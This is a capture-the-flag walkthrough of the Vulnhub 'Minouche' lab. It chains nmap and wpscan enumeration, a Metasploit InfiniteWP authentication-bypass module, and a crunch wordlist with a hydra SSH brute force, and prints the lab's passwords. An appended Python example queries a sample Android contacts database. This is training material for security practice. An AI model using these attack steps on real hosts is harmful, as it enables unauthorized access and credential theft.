Vulnhub – Minouche Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.9 -vv

Then scanning with dirb http://192.168.1.9 /usr/share/dirb/wordlists/big.txt

The host is running WordPress, so we scan for users: wpscan --url http://192.168.1.9 -e u

And search for plugins: wpscan --url http://192.168.1.9 -e p --plugins-detection aggressive. Make sure to use "--plugins-detection aggressive", as nothing will come up when enumerating plugins with the normal detection mode.

Searching for the plugin with searchsploit WordPress Plugin InfiniteWP:

Now we run Metasploit and use exploit/unix/webapp/wp_infinitewp_auth_bypass

And we got a shell:

OK, there is a file named kitty.txt in the / directory:

So we use crunch to generate the password list. The command should be crunch 13 13 -t "$"Minouche20%% (it took me a while to realize the $ needs to be between double quotes).

And then we use hydra to brute force the SSH service: hydra -l kitty -P password.txt ssh://192.168.1.9

And the password is $Minouche2005

Now for the android.zip file: I transferred it back to my machine, unzipped it and went through it to see if there was anything interesting. I found a photo of contacts, and there is one contact named Pincode, in this path data/system_ce/0/snapshots/:

Now to search the contacts folder /root/data/data/com.android.providers.contacts/databases/contacts2.db:

In the Browse Data section, going through the data you will find the password YouWillNeverGue$$This
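
The same lookup done with a query instead of a GUI browser, as an added example that is not part of the original walkthrough: it opens the database read-only and joins contact names to their data rows. The reduced schema and every row are constructed for illustration; the table and column names (raw_contacts, data, mimetypes, data1) are assumed to match the contacts2.db in the image.

```python
import sqlite3
import tempfile
from pathlib import Path

# Constructed stand-in for contacts2.db: only the tables and columns the query
# needs (assumed to mirror the real schema), filled with made-up rows.
SAMPLE_SQL = """
CREATE TABLE mimetypes (_id INTEGER PRIMARY KEY, mimetype TEXT);
CREATE TABLE raw_contacts (_id INTEGER PRIMARY KEY, display_name TEXT, deleted INTEGER);
CREATE TABLE data (_id INTEGER PRIMARY KEY, raw_contact_id INTEGER, mimetype_id INTEGER, data1 TEXT);
INSERT INTO mimetypes VALUES (1, 'vnd.android.cursor.item/name'), (2, 'vnd.android.cursor.item/phone_v2');
INSERT INTO raw_contacts VALUES (1, 'Alice Example', 0), (2, 'Pincode', 0), (3, 'Old Entry', 1);
INSERT INTO data VALUES (1, 1, 1, 'Alice Example'), (2, 1, 2, '555-0100'),
  (3, 2, 1, 'Pincode'), (4, 2, 2, 'CONSTRUCTED-VALUE'), (5, 3, 1, 'Old Entry');
"""

def build_sample_db(path):
    con = sqlite3.connect(path)
    con.executescript(SAMPLE_SQL)
    con.commit()
    con.close()

def open_readonly(path):
    # mode=ro stops SQLite from writing to the extracted evidence file.
    return sqlite3.connect(Path(path).resolve().as_uri() + "?mode=ro", uri=True)

def contact_rows(path, name_like="%"):
    """Return (display_name, deleted, mimetype, data1) for matching contacts."""
    con = open_readonly(path)
    try:
        return con.execute(
            """SELECT rc.display_name, rc.deleted, m.mimetype, d.data1
               FROM data d
               JOIN raw_contacts rc ON rc._id = d.raw_contact_id
               JOIN mimetypes m ON m._id = d.mimetype_id
               WHERE rc.display_name LIKE ?
               ORDER BY rc._id, d._id""", (name_like,)).fetchall()
    finally:
        con.close()

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        db = Path(tmp) / "contacts2.db"
        build_sample_db(db)
        for row in contact_rows(db, "Pincode"):
            print(row)
```

Rows whose deleted flag is 1 are returned as well, so entries the user removed but that are still in the file show up in the listing.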
